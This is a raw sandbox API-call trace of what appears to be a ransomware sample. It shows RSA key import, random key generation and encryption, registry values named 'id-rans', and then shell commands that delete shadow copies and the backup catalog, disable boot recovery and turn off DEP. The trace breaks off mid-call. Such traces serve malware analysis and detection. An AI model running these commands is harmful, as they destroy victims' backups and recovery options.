CryptAcquireContextW (in: phProv=0x18ff0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18ff0c*=0x328798) returned 1 [0098.412] CryptImportPublicKeyInfo (in: hCryptProv=0x328798, dwCertEncodingType=0x1, pInfo=0x32f868*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x32f898*, PublicKey.cbData=0x10e, PublicKey.pbData=0x32f8a0*, PublicKey.cUnusedBits=0x0), phKey=0x18ff10 | out: phKey=0x18ff10*=0x317308) returned 1 [0098.413] CryptAcquireContextW (in: phProv=0x18ff0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18ff0c*=0x328710) returned 1 [0098.414] CryptImportPublicKeyInfo (in: hCryptProv=0x328710, dwCertEncodingType=0x1, pInfo=0x32f868*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x32f898*, PublicKey.cbData=0x10e, PublicKey.pbData=0x32f8a0*, PublicKey.cUnusedBits=0x0), phKey=0x18ff10 | out: phKey=0x18ff10*=0x3179c8) returned 1 [0098.414] CryptAcquireContextW (in: phProv=0x18ff18, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x18ff18*=0x328820) returned 1 [0098.414] LocalFree (hMem=0x32f868) returned 0x0 [0098.414] CryptGenRandom (in: hProv=0x328820, dwLen=0x20, pbBuffer=0x18fdb8 | out: pbBuffer=0x18fdb8) returned 1 [0098.414] CryptGenRandom (in: hProv=0x328820, dwLen=0x8, pbBuffer=0x18fe84 | out: pbBuffer=0x18fe84) returned 1 [0098.414] GetProcessHeap () returned 0x2e0000 [0098.414] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4a7) returned 0x339740 [0098.415] VirtualFree (lpAddress=0x1d0000, dwSize=0x0, dwFreeType=0x8000) returned 0 [0098.415] CryptEncrypt (in: hKey=0x3179c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18fee8*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x18fee8*=0x100) returned 1 [0098.415] GetProcessHeap () returned 0x2e0000 [0098.415] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x5af) returned 0x339bf0 [0098.415] GetProcessHeap () returned 0x2e0000 [0098.415] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x301d70 [0098.415] CryptEncrypt (in: hKey=0x3179c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x301d70*, pdwDataLen=0x18feb4*=0x20, dwBufLen=0x100 | out: pbData=0x301d70*, pdwDataLen=0x18feb4*=0x100) returned 1 [0098.415] CryptBinaryToStringW (in: pbBinary=0x339bf0, cbBinary=0x5af, dwFlags=0x40000001, pszString=0x0, pcchString=0x18ff2c | out: pszString=0x0, pcchString=0x18ff2c) returned 1 [0098.415] CryptBinaryToStringW (in: pbBinary=0x339bf0, cbBinary=0x5af, dwFlags=0x40000001, pszString=0x45a1f8, pcchString=0x18ff2c | out: pszString="6BZ15llTpdeTMlSTBopEuMenQYpltjsuVxdS+XvY/b+atKNQCMrbJvLUzFuZrK1Xdc8ul5Wb2EX9peTZ78tQM4KtubwmRN88WpuWKtBUudidgIuVf+a2aceysKmi++KXUwQP0UeM1yeEPUAF56UmLMlZysks/SoJDShu9fZVbF/miAE8Clc1UYFSOFNZ3qxPlm9l3TFlKLxUWKuUDNqTFQvrjbVG7Ew4tlx9Zi4R1ElyxqkyNTJOAsdQkGQT8j7WmQboqgxsPHQ2EijjHuHzxHKfwBiwz1ZNR0UUlhl21OVjsCyVhVt0w8ELVpXCBLjYrNaE7lkuMJH/7+2GAWvc7+0lqqnsqYXwjeDB1pgoCcz/kQD1hEdxJigl5W+uvxRmfNhrCfqwSS7PiLGjk9oh9SnJLCC0/ZMDJWueHKWpSWAsrRqBMnnzbK0fFYHLC+wNKDYUR8JjZrltyGFpWMWT6L/R224DtdXxIpWCASCeT1BFXullJJobOYhU+a/2+IgtmBPgYL5o5XvBMbKfAMHVZGQpBND4+lHngwlQ0WIMoDSbvEqTOrgcnSCkBpBL4Jz/zeRuw7ylOLdxBBv/IPAkQdig/m/cJqyM+ajq0Ea2n+sxQ3UQvi+k8dSHQ14EUf+rJWx+cbIVjGw9RPpg5/TYKW8t5S/SdozIy5DL+U18mzoKIVsa91Wk4LxyxOD94sJd4cifgkyVk4+wv4+VclOVtLHjsHFte2IFwwo9cNr6BJ/EDTBbgeUlrWmhtzglt9unxKovNSWUN9DhYYUxkrb7PkMaklGCQnvepxVU/0fpa1O4+GpKa340sZGYqZFkXP326oDPotWiK8e8h2OQWWBHfyQhS4eJdefMuYpD4z2m2pHs19wr7kBs91LQMY0wrVZ1sZWH13eQUjJKWxt7NDu6HFZBo7u2lNTvE6gS/UbZKRNXYsNwYsORNYTqDrUhtgMs7m2EXhoHESHPy+0zZcB5WLzeODOcVW/HVWQYaQ2bGRvaXO4GC5aImEscOoTx8fcl77P7+lOE7MaWKBgniK5AAyBMZcKUXLka6bKt2uAxFL8GLW5LBcaKc5syiFvCJ4uENBcN54ZO3cxi9GNAYCAoMOtArJrWYWVEGu255Ubx6F3GQAWXs0vpKiB/Mmm/lvVsVRaRCQR0XHj8VbCcz/ro3ciAdNv9yg+CitNwaTT8t7bpgoDRsYz6XKCNpTMK0hcwQ5g11ZuU33n9Xjr2zNWdOjy2xpL9U25RUhdtw0KCHR/EVdgC1A4QmiS46dAkcLuTFNN21KL4XpTyeU66y6j1titr4XugYE8G7HnSofjkP7iJ+o25a0LvIWePyhR73P9GgvRSwCkZyYHorNEEje2VUWjfbJoIbM9Jzd2+pd03YfH0ombtEXh+K7GgNWgZzcVxx2aZcdk9ycN/ykDRtTmGjIIiKlTdY+DwC4lV3PJKiWKVUoPhbZ3KqZGnSMt2C+fBUwpMKhh2M4jdwdBD0RLbpKlzHFFcJ38krmswKq84jnUzHsyWckuj5l+ytsVON6B9Wayq0emJcacJlNrfHaCRdlHeg+eqkyuev4yfLP/eLcebWU9eE9zidkqLaioqhw66kvBrZFg7ychM1FaVuCWtgyRjQXmnfxU9v26a3UgrQ1Xq7ncNXkcgA7NF1NxqZIh+LYSwxpvKS/PPJT2XCWc3Yw2H33EI+hin8MuXOrDft6PsS4flpF59SRVW6ONuJsD8fgGUIxvlx2EP7WFUiTXWOdPh7gBDiVuLbwpPOFApM5Q4Nn5DsPAdxURG8/8ikIETQQxlb/vPpHWNc6FicmttOLI0kpr7XnOA6oKL91yiGcn4l92Xds5Tv3kdt5h7S/WAD52N7yovrunI152GadsKLAQ72QOkkXq2NIxTSY6Ru+prJ3He5FeQrhGue7PBF5Fde/9rf+xshlJSa34LzkpQ", pcchString=0x18ff2c) returned 1 [0098.416] GetProcessHeap () returned 0x2e0000 [0098.416] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x339740 | out: hHeap=0x2e0000) returned 1 [0098.416] GetProcessHeap () returned 0x2e0000 [0098.416] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x301d70 | out: hHeap=0x2e0000) returned 1 [0098.416] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18ff20 | out: phkResult=0x18ff20*=0x36c) returned 0x0 [0098.416] lstrlenW (lpString="6BZ15llTpdeTMlSTBopEuMenQYpltjsuVxdS+XvY/b+atKNQCMrbJvLUzFuZrK1Xdc8ul5Wb2EX9peTZ78tQM4KtubwmRN88WpuWKtBUudidgIuVf+a2aceysKmi++KXUwQP0UeM1yeEPUAF56UmLMlZysks/SoJDShu9fZVbF/miAE8Clc1UYFSOFNZ3qxPlm9l3TFlKLxUWKuUDNqTFQvrjbVG7Ew4tlx9Zi4R1ElyxqkyNTJOAsdQkGQT8j7WmQboqgxsPHQ2EijjHuHzxHKfwBiwz1ZNR0UUlhl21OVjsCyVhVt0w8ELVpXCBLjYrNaE7lkuMJH/7+2GAWvc7+0lqqnsqYXwjeDB1pgoCcz/kQD1hEdxJigl5W+uvxRmfNhrCfqwSS7PiLGjk9oh9SnJLCC0/ZMDJWueHKWpSWAsrRqBMnnzbK0fFYHLC+wNKDYUR8JjZrltyGFpWMWT6L/R224DtdXxIpWCASCeT1BFXullJJobOYhU+a/2+IgtmBPgYL5o5XvBMbKfAMHVZGQpBND4+lHngwlQ0WIMoDSbvEqTOrgcnSCkBpBL4Jz/zeRuw7ylOLdxBBv/IPAkQdig/m/cJqyM+ajq0Ea2n+sxQ3UQvi+k8dSHQ14EUf+rJWx+cbIVjGw9RPpg5/TYKW8t5S/SdozIy5DL+U18mzoKIVsa91Wk4LxyxOD94sJd4cifgkyVk4+wv4+VclOVtLHjsHFte2IFwwo9cNr6BJ/EDTBbgeUlrWmhtzglt9unxKovNSWUN9DhYYUxkrb7PkMaklGCQnvepxVU/0fpa1O4+GpKa340sZGYqZFkXP326oDPotWiK8e8h2OQWWBHfyQhS4eJdefMuYpD4z2m2pHs19wr7kBs91LQMY0wrVZ1sZWH13eQUjJKWxt7NDu6HFZBo7u2lNTvE6gS/UbZKRNXYsNwYsORNYTqDrUhtgMs7m2EXhoHESHPy+0zZcB5WLzeODOcVW/HVWQYaQ2bGRvaXO4GC5aImEscOoTx8fcl77P7+lOE7MaWKBgniK5AAyBMZcKUXLka6bKt2uAxFL8GLW5LBcaKc5syiFvCJ4uENBcN54ZO3cxi9GNAYCAoMOtArJrWYWVEGu255Ubx6F3GQAWXs0vpKiB/Mmm/lvVsVRaRCQR0XHj8VbCcz/ro3ciAdNv9yg+CitNwaTT8t7bpgoDRsYz6XKCNpTMK0hcwQ5g11ZuU33n9Xjr2zNWdOjy2xpL9U25RUhdtw0KCHR/EVdgC1A4QmiS46dAkcLuTFNN21KL4XpTyeU66y6j1titr4XugYE8G7HnSofjkP7iJ+o25a0LvIWePyhR73P9GgvRSwCkZyYHorNEEje2VUWjfbJoIbM9Jzd2+pd03YfH0ombtEXh+K7GgNWgZzcVxx2aZcdk9ycN/ykDRtTmGjIIiKlTdY+DwC4lV3PJKiWKVUoPhbZ3KqZGnSMt2C+fBUwpMKhh2M4jdwdBD0RLbpKlzHFFcJ38krmswKq84jnUzHsyWckuj5l+ytsVON6B9Wayq0emJcacJlNrfHaCRdlHeg+eqkyuev4yfLP/eLcebWU9eE9zidkqLaioqhw66kvBrZFg7ychM1FaVuCWtgyRjQXmnfxU9v26a3UgrQ1Xq7ncNXkcgA7NF1NxqZIh+LYSwxpvKS/PPJT2XCWc3Yw2H33EI+hin8MuXOrDft6PsS4flpF59SRVW6ONuJsD8fgGUIxvlx2EP7WFUiTXWOdPh7gBDiVuLbwpPOFApM5Q4Nn5DsPAdxURG8/8ikIETQQxlb/vPpHWNc6FicmttOLI0kpr7XnOA6oKL91yiGcn4l92Xds5Tv3kdt5h7S/WAD52N7yovrunI152GadsKLAQ72QOkkXq2NIxTSY6Ru+prJ3He5FeQrhGue7PBF5Fde/9rf+xshlJSa34LzkpQ") returned 1940 [0098.416] RegSetValueExW (in: hKey=0x36c, lpValueName="id-rans-dat", Reserved=0x0, dwType=0x1, lpData="6BZ15llTpdeTMlSTBopEuMenQYpltjsuVxdS+XvY/b+atKNQCMrbJvLUzFuZrK1Xdc8ul5Wb2EX9peTZ78tQM4KtubwmRN88WpuWKtBUudidgIuVf+a2aceysKmi++KXUwQP0UeM1yeEPUAF56UmLMlZysks/SoJDShu9fZVbF/miAE8Clc1UYFSOFNZ3qxPlm9l3TFlKLxUWKuUDNqTFQvrjbVG7Ew4tlx9Zi4R1ElyxqkyNTJOAsdQkGQT8j7WmQboqgxsPHQ2EijjHuHzxHKfwBiwz1ZNR0UUlhl21OVjsCyVhVt0w8ELVpXCBLjYrNaE7lkuMJH/7+2GAWvc7+0lqqnsqYXwjeDB1pgoCcz/kQD1hEdxJigl5W+uvxRmfNhrCfqwSS7PiLGjk9oh9SnJLCC0/ZMDJWueHKWpSWAsrRqBMnnzbK0fFYHLC+wNKDYUR8JjZrltyGFpWMWT6L/R224DtdXxIpWCASCeT1BFXullJJobOYhU+a/2+IgtmBPgYL5o5XvBMbKfAMHVZGQpBND4+lHngwlQ0WIMoDSbvEqTOrgcnSCkBpBL4Jz/zeRuw7ylOLdxBBv/IPAkQdig/m/cJqyM+ajq0Ea2n+sxQ3UQvi+k8dSHQ14EUf+rJWx+cbIVjGw9RPpg5/TYKW8t5S/SdozIy5DL+U18mzoKIVsa91Wk4LxyxOD94sJd4cifgkyVk4+wv4+VclOVtLHjsHFte2IFwwo9cNr6BJ/EDTBbgeUlrWmhtzglt9unxKovNSWUN9DhYYUxkrb7PkMaklGCQnvepxVU/0fpa1O4+GpKa340sZGYqZFkXP326oDPotWiK8e8h2OQWWBHfyQhS4eJdefMuYpD4z2m2pHs19wr7kBs91LQMY0wrVZ1sZWH13eQUjJKWxt7NDu6HFZBo7u2lNTvE6gS/UbZKRNXYsNwYsORNYTqDrUhtgMs7m2EXhoHESHPy+0zZcB5WLzeODOcVW/HVWQYaQ2bGRvaXO4GC5aImEscOoTx8fcl77P7+lOE7MaWKBgniK5AAyBMZcKUXLka6bKt2uAxFL8GLW5LBcaKc5syiFvCJ4uENBcN54ZO3cxi9GNAYCAoMOtArJrWYWVEGu255Ubx6F3GQAWXs0vpKiB/Mmm/lvVsVRaRCQR0XHj8VbCcz/ro3ciAdNv9yg+CitNwaTT8t7bpgoDRsYz6XKCNpTMK0hcwQ5g11ZuU33n9Xjr2zNWdOjy2xpL9U25RUhdtw0KCHR/EVdgC1A4QmiS46dAkcLuTFNN21KL4XpTyeU66y6j1titr4XugYE8G7HnSofjkP7iJ+o25a0LvIWePyhR73P9GgvRSwCkZyYHorNEEje2VUWjfbJoIbM9Jzd2+pd03YfH0ombtEXh+K7GgNWgZzcVxx2aZcdk9ycN/ykDRtTmGjIIiKlTdY+DwC4lV3PJKiWKVUoPhbZ3KqZGnSMt2C+fBUwpMKhh2M4jdwdBD0RLbpKlzHFFcJ38krmswKq84jnUzHsyWckuj5l+ytsVON6B9Wayq0emJcacJlNrfHaCRdlHeg+eqkyuev4yfLP/eLcebWU9eE9zidkqLaioqhw66kvBrZFg7ychM1FaVuCWtgyRjQXmnfxU9v26a3UgrQ1Xq7ncNXkcgA7NF1NxqZIh+LYSwxpvKS/PPJT2XCWc3Yw2H33EI+hin8MuXOrDft6PsS4flpF59SRVW6ONuJsD8fgGUIxvlx2EP7WFUiTXWOdPh7gBDiVuLbwpPOFApM5Q4Nn5DsPAdxURG8/8ikIETQQxlb/vPpHWNc6FicmttOLI0kpr7XnOA6oKL91yiGcn4l92Xds5Tv3kdt5h7S/WAD52N7yovrunI152GadsKLAQ72QOkkXq2NIxTSY6Ru+prJ3He5FeQrhGue7PBF5Fde/9rf+xshlJSa34LzkpQ", cbData=0xf28 | out: lpData="6BZ15llTpdeTMlSTBopEuMenQYpltjsuVxdS+XvY/b+atKNQCMrbJvLUzFuZrK1Xdc8ul5Wb2EX9peTZ78tQM4KtubwmRN88WpuWKtBUudidgIuVf+a2aceysKmi++KXUwQP0UeM1yeEPUAF56UmLMlZysks/SoJDShu9fZVbF/miAE8Clc1UYFSOFNZ3qxPlm9l3TFlKLxUWKuUDNqTFQvrjbVG7Ew4tlx9Zi4R1ElyxqkyNTJOAsdQkGQT8j7WmQboqgxsPHQ2EijjHuHzxHKfwBiwz1ZNR0UUlhl21OVjsCyVhVt0w8ELVpXCBLjYrNaE7lkuMJH/7+2GAWvc7+0lqqnsqYXwjeDB1pgoCcz/kQD1hEdxJigl5W+uvxRmfNhrCfqwSS7PiLGjk9oh9SnJLCC0/ZMDJWueHKWpSWAsrRqBMnnzbK0fFYHLC+wNKDYUR8JjZrltyGFpWMWT6L/R224DtdXxIpWCASCeT1BFXullJJobOYhU+a/2+IgtmBPgYL5o5XvBMbKfAMHVZGQpBND4+lHngwlQ0WIMoDSbvEqTOrgcnSCkBpBL4Jz/zeRuw7ylOLdxBBv/IPAkQdig/m/cJqyM+ajq0Ea2n+sxQ3UQvi+k8dSHQ14EUf+rJWx+cbIVjGw9RPpg5/TYKW8t5S/SdozIy5DL+U18mzoKIVsa91Wk4LxyxOD94sJd4cifgkyVk4+wv4+VclOVtLHjsHFte2IFwwo9cNr6BJ/EDTBbgeUlrWmhtzglt9unxKovNSWUN9DhYYUxkrb7PkMaklGCQnvepxVU/0fpa1O4+GpKa340sZGYqZFkXP326oDPotWiK8e8h2OQWWBHfyQhS4eJdefMuYpD4z2m2pHs19wr7kBs91LQMY0wrVZ1sZWH13eQUjJKWxt7NDu6HFZBo7u2lNTvE6gS/UbZKRNXYsNwYsORNYTqDrUhtgMs7m2EXhoHESHPy+0zZcB5WLzeODOcVW/HVWQYaQ2bGRvaXO4GC5aImEscOoTx8fcl77P7+lOE7MaWKBgniK5AAyBMZcKUXLka6bKt2uAxFL8GLW5LBcaKc5syiFvCJ4uENBcN54ZO3cxi9GNAYCAoMOtArJrWYWVEGu255Ubx6F3GQAWXs0vpKiB/Mmm/lvVsVRaRCQR0XHj8VbCcz/ro3ciAdNv9yg+CitNwaTT8t7bpgoDRsYz6XKCNpTMK0hcwQ5g11ZuU33n9Xjr2zNWdOjy2xpL9U25RUhdtw0KCHR/EVdgC1A4QmiS46dAkcLuTFNN21KL4XpTyeU66y6j1titr4XugYE8G7HnSofjkP7iJ+o25a0LvIWePyhR73P9GgvRSwCkZyYHorNEEje2VUWjfbJoIbM9Jzd2+pd03YfH0ombtEXh+K7GgNWgZzcVxx2aZcdk9ycN/ykDRtTmGjIIiKlTdY+DwC4lV3PJKiWKVUoPhbZ3KqZGnSMt2C+fBUwpMKhh2M4jdwdBD0RLbpKlzHFFcJ38krmswKq84jnUzHsyWckuj5l+ytsVON6B9Wayq0emJcacJlNrfHaCRdlHeg+eqkyuev4yfLP/eLcebWU9eE9zidkqLaioqhw66kvBrZFg7ychM1FaVuCWtgyRjQXmnfxU9v26a3UgrQ1Xq7ncNXkcgA7NF1NxqZIh+LYSwxpvKS/PPJT2XCWc3Yw2H33EI+hin8MuXOrDft6PsS4flpF59SRVW6ONuJsD8fgGUIxvlx2EP7WFUiTXWOdPh7gBDiVuLbwpPOFApM5Q4Nn5DsPAdxURG8/8ikIETQQxlb/vPpHWNc6FicmttOLI0kpr7XnOA6oKL91yiGcn4l92Xds5Tv3kdt5h7S/WAD52N7yovrunI152GadsKLAQ72QOkkXq2NIxTSY6Ru+prJ3He5FeQrhGue7PBF5Fde/9rf+xshlJSa34LzkpQ") returned 0x0 [0098.416] RegCloseKey (hKey=0x36c) returned 0x0 [0098.416] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x18ff14 | out: phkResult=0x18ff14*=0x36c) returned 0x0 [0098.417] VirtualAlloc (lpAddress=0x0, dwSize=0x2000, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0098.417] RegQueryValueExW (in: hKey=0x36c, lpValueName="id-rans", lpReserved=0x0, lpType=0x0, lpData=0x3f0000, lpcbData=0x18fed0*=0x2000 | out: lpType=0x0, lpData=0x3f0000*=0x2d, lpcbData=0x18fed0*=0x376) returned 0x0 [0098.417] RegCloseKey (hKey=0x36c) returned 0x0 [0098.417] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzWRInN0cSgCIpzWwVRnVWvdlSEUNe0d8YAPsHgqkRU5urnXPNU9SmB4OZ+8+3Hcg+gHMZeHpgttWvXYE53tXBDyfpFxRnUIU6kHANsqHSSUdqmIsa9/ljtvDSdrkM2qi6gZC57hEGjJfSouA3zhuLGyqsdZC3u/B0cC2p3Od3Y07JVzNgiLWyLv/p4RVCGAntyCDYegqh0HKLuUJ6qV25BQDicVl8GsgUTQ0pfQ4c1Yq2oRt2iUAEv8yEoJ940mIBIom//X8+Ess4MjyNi6f9QzpPc0fRYgJ5jlZOYL3hohK+85ovOUVWr0And1By06oJBkPkwb0BkgFdHl2l94DnwIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x18d628, pcbBinary=0x18de2c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x18d628, pcbBinary=0x18de2c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0098.417] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x18d628, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x18de30, pcbStructInfo=0x18de28 | out: pvStructInfo=0x18de30, pcbStructInfo=0x18de28) returned 1 [0098.417] CryptAcquireContextW (in: phProv=0x45a1e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x45a1e0*=0x3288a8) returned 1 [0098.418] CryptImportPublicKeyInfo (in: hCryptProv=0x3288a8, dwCertEncodingType=0x1, pInfo=0x32f868*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x32f898*, PublicKey.cbData=0x10e, PublicKey.pbData=0x32f8a0*, PublicKey.cUnusedBits=0x0), phKey=0x45a1d8 | out: phKey=0x45a1d8*=0x317a08) returned 1 [0098.418] CryptAcquireContextW (in: phProv=0x45a1e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x45a1e0*=0x328930) returned 1 [0098.418] CryptImportPublicKeyInfo (in: hCryptProv=0x328930, dwCertEncodingType=0x1, pInfo=0x32f868*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x32f898*, PublicKey.cbData=0x10e, PublicKey.pbData=0x32f8a0*, PublicKey.cUnusedBits=0x0), phKey=0x45a1d8 | out: phKey=0x45a1d8*=0x317a48) returned 1 [0098.418] CryptAcquireContextW (in: phProv=0x45a1dc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x45a1dc*=0x3289b8) returned 1 [0098.419] LocalFree (hMem=0x32f868) returned 0x0 [0098.419] LocalFree (hMem=0x3407c8) returned 0x0 [0098.419] LocalFree (hMem=0x30dd50) returned 0x0 [0098.419] GetProcessHeap () returned 0x2e0000 [0098.419] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336bc8 | out: hHeap=0x2e0000) returned 1 [0098.419] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.419] CryptDestroyKey (hKey=0x317348) returned 1 [0098.419] CryptDestroyKey (hKey=0x3179c8) returned 1 [0098.419] CryptReleaseContext (hProv=0x328710, dwFlags=0x0) returned 1 [0098.419] CryptReleaseContext (hProv=0x328578, dwFlags=0x0) returned 1 [0098.419] Wow64DisableWow64FsRedirection (in: OldValue=0x18de30 | out: OldValue=0x18de30*=0x0) returned 1 [0098.419] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18dddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18de20 | out: lpCommandLine="/C bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x18de20*(hProcess=0x370, hThread=0x36c, dwProcessId=0x4a0, dwThreadId=0x838)) returned 1 [0098.431] CloseHandle (hObject=0x370) returned 1 [0098.431] CloseHandle (hObject=0x36c) returned 1 [0098.431] Wow64DisableWow64FsRedirection (in: OldValue=0x18de2c | out: OldValue=0x18de2c*=0x1) returned 1 [0098.432] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C bcdedit /set {default} recoveryenabled no", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18ddd8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18de1c | out: lpCommandLine="/C bcdedit /set {default} recoveryenabled no", lpProcessInformation=0x18de1c*(hProcess=0x370, hThread=0x36c, dwProcessId=0x83c, dwThreadId=0x58c)) returned 1 [0098.436] CloseHandle (hObject=0x370) returned 1 [0098.436] CloseHandle (hObject=0x36c) returned 1 [0098.436] Wow64DisableWow64FsRedirection (in: OldValue=0x18de28 | out: OldValue=0x18de28*=0x1) returned 1 [0098.436] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C wbadmin delete catalog -quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18ddd4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18de18 | out: lpCommandLine="/C wbadmin delete catalog -quiet", lpProcessInformation=0x18de18*(hProcess=0x370, hThread=0x36c, dwProcessId=0x4f0, dwThreadId=0x6a8)) returned 1 [0098.640] CloseHandle (hObject=0x370) returned 1 [0098.640] CloseHandle (hObject=0x36c) returned 1 [0098.640] Wow64DisableWow64FsRedirection (in: OldValue=0x18de24 | out: OldValue=0x18de24*=0x1) returned 1 [0098.640] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C vssadmin.exe delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18ddd0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18de14 | out: lpCommandLine="/C vssadmin.exe delete shadows /all /quiet", lpProcessInformation=0x18de14*(hProcess=0x370, hThread=0x36c, dwProcessId=0x738, dwThreadId=0x534)) returned 1 [0098.645] CloseHandle (hObject=0x370) returned 1 [0098.645] CloseHandle (hObject=0x36c) returned 1 [0098.645] Wow64DisableWow64FsRedirection (in: OldValue=0x18de20 | out: OldValue=0x18de20*=0x1) returned 1 [0098.645] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C bcdedit.exe /set {current} nx AlwaysOff", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18ddcc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18de10 | out: lpCommandLine="/C bcdedit.exe /set {current} nx AlwaysOff", lpProcessInformation=0x18de10*(hProcess=0x370, hThread=0x36c, dwProcessId=0x6d0, dwThreadId=0x89c)) returned 1 [0098.650] CloseHandle (hObject=0x370) returned 1 [0098.650] CloseHandle (hObject=0x36c) returned 1 [0098.650] Wow64DisableWow64FsRedirection (in: OldValue=0x18de1c | out: OldValue=0x18de1c*=0x1) returned 1 [0098.650] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C wmic SHADOWCOPY DELETE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18ddc8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, 